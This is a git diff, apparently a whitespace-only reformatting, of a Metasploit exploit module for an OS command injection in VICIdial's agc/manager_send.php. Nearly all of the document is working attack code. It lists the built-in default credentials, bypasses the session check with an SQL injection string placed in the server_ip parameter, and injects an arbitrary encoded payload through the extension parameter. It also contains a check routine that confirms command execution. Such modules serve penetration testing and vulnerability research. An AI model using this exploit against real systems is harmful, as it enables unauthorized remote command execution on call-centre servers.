diff --git a/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb b/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb
index 305a0d8562..848d5000c2 100755
--- a/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb
+++ b/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb
@@ -6,109 +6,109 @@
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'VICIdial Manager Send OS Command Injection',
- 'Description' => %q{
- The file agc/manager_send.php in the VICIdial web application uses
- unsanitized user input as part of a command that is executed using the PHP
- passthru() function. A valid username, password and session are needed to access
- the injection point. Fortunately, VICIdial has two built-in accounts with default
- passwords and the manager_send.php file has a SQL injection vulnerability that can
- be used to bypass the session check as long as at least one session has been
- created at some point in time. The results of the injected command are returned
- as part of the response from the web server. Affected versions include 2.7RC1,
- 2.7, and 2.8-403a. Other versions are likely affected as well. The default
- credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
- },
- 'Author' =>
- [
- 'Adam Caudill ', # Vulnerability discovery
- 'AverageSecurityGuy ' # Metasploit Module
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ]
- ],
- 'DisclosureDate' => 'Oct 23 2013',
- 'Privileged' => true,
- 'Platform' => ['linux','unix'],
- 'Payload' =>
- {
- 'DisableNops' => true
- },
- 'Targets' =>
- [
- [ 'CMD',
- {
- 'Arch' => ARCH_CMD,
- 'Platform' => 'unix'
- }
- ],
- ],
- 'DefaultTarget' => 0
- ))
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'VICIdial Manager Send OS Command Injection',
+ 'Description' => %q{
+ The file agc/manager_send.php in the VICIdial web application uses
+ unsanitized user input as part of a command that is executed using the PHP
+ passthru() function. A valid username, password and session are needed to access
+ the injection point. Fortunately, VICIdial has two built-in accounts with default
+ passwords and the manager_send.php file has a SQL injection vulnerability that can
+ be used to bypass the session check as long as at least one session has been
+ created at some point in time. The results of the injected command are returned
+ as part of the response from the web server. Affected versions include 2.7RC1,
+ 2.7, and 2.8-403a. Other versions are likely affected as well. The default
+ credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
+ },
+ 'Author' =>
+ [
+ 'Adam Caudill ', # Vulnerability discovery
+ 'AverageSecurityGuy ' # Metasploit Module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ]
+ ],
+ 'DisclosureDate' => 'Oct 23 2013',
+ 'Privileged' => true,
+ 'Platform' => ['linux','unix'],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Targets' =>
+ [
+ [ 'CMD',
+ {
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0
+ ))
- register_options(
- [
- OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
- OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
- ], self.class)
- end
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
+ OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
+ ], self.class)
+ end
- def request(cmd)
- begin
- res = send_request_cgi({
- 'uri' => '/agc/manager_send.php',
- 'method' => 'GET',
- 'vars_get' => {
- "enable_sipsak_messages" => "1",
- "allow_sipsak_messages" => "1",
- "protocol" => "sip",
- "ACTION" => "OriginateVDRelogin",
- "session_name" => rand_text_alpha(12), # Random session name
- "server_ip" => "' OR '1' = '1", # SQL Injection to validate the session
- "extension" => ";#{cmd};",
- "user" => datastore['USERNAME'],
- "pass" => datastore['PASSWORD']
- }
- })
+ def request(cmd)
+ begin
+ res = send_request_cgi({
+ 'uri' => '/agc/manager_send.php',
+ 'method' => 'GET',
+ 'vars_get' => {
+ "enable_sipsak_messages" => "1",
+ "allow_sipsak_messages" => "1",
+ "protocol" => "sip",
+ "ACTION" => "OriginateVDRelogin",
+ "session_name" => rand_text_alpha(12), # Random session name
+ "server_ip" => "' OR '1' = '1", # SQL Injection to validate the session
+ "extension" => ";#{cmd};",
+ "user" => datastore['USERNAME'],
+ "pass" => datastore['PASSWORD']
+ }
+ })
- if res.nil? or res.code == 404
- vprint_error("#{rhost}:#{rport} - No response or page not found.")
- return nil
- end
+ if res.nil? or res.code == 404
+ vprint_error("#{rhost}:#{rport} - No response or page not found.")
+ return nil
+ end
- if res.body =~ /Invalid Username\/Password/
- vprint_error("#{rhost}:#{rport} - Invalid Username or Password.")
- return nil
- end
+ if res.body =~ /Invalid Username\/Password/
+ vprint_error("#{rhost}:#{rport} - Invalid Username or Password.")
+ return nil
+ end
- return res
- rescue ::Rex::ConnectionError
- vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
- return nil
- end
- end
+ return res
+ rescue ::Rex::ConnectionError
+ vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+ return nil
+ end
+ end
- def check
- resp = request('ls -a .')
-
- vprint_line(resp.body)
- if resp.body =~ /\.\n\.\.\n/m
- return Exploit::CheckCode::Vulnerable
- else
- return Exploit::CheckCode::Detected
- end
- end
+ def check
+ resp = request('ls -a .')
- def exploit
- request("#{payload.encode}")
- end
+ vprint_line(resp.body)
+ if resp.body =~ /\.\n\.\.\n/m
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Detected
+ end
+ end
+
+ def exploit
+ request("#{payload.encode}")
+ end
 end